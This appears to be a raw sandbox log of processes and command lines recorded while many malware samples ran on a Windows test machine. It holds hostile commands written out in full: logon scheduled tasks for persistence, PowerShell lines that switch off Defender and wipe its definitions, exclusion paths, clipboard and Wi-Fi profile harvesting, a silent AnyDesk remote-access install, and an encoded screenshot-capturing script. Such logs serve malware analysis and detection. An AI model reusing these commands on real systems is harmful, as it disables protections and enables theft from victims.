C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe
"C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe
"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"
C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\a\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe
"C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JpsXGIQt8bGP.bat" "
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SYSTEM32\msiexec.exe
msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.0.1
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.1.10.1
C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe
"C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe"
C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe
"C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe"
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DbsVCvDMFD4m.bat" "
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5128 -ip 5128
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 1324
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\a\leto.exe
"C:\Users\Admin\AppData\Local\Temp\a\leto.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a51J4.exe
C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe
"C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe"
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dxwsetup.exe
C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe
"C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Y06E.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Y06E.exe
C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe
"C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe"
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\a\laz.exe
"C:\Users\Admin\AppData\Local\Temp\a\laz.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1336.tmp\1337.tmp\1338.bat C:\Users\Admin\AppData\Local\Temp\a\laz.exe"
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe"
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-service
C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe
"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-control
C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe
"C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2972 -ip 2972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 1268
C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe
"C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\64F0.tmp\64F1.tmp\64F2.bat C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"
C:\Users\Admin\AppData\Roaming\AnyDesk.exe
C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent
C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe"
C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe"
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service
C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\System32\xda.dll
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3184 -ip 3184
C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe"
C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe
"C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 404
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"
C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"
C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe
"C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe"
C:\Users\Admin\AppData\Local\Temp\a\srtware.exe
"C:\Users\Admin\AppData\Local\Temp\a\srtware.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3184 -ip 3184
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 412
C:\Program Files (x86)\AnyDesk\AnyDesk.exe
"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6780 -ip 6780
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe
"C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 84
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Users\Admin\AppData\Local\Temp\a\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"
C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe
"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe
"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Users\Admin\AppData\Local\complacence\outvaunts.exe
"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
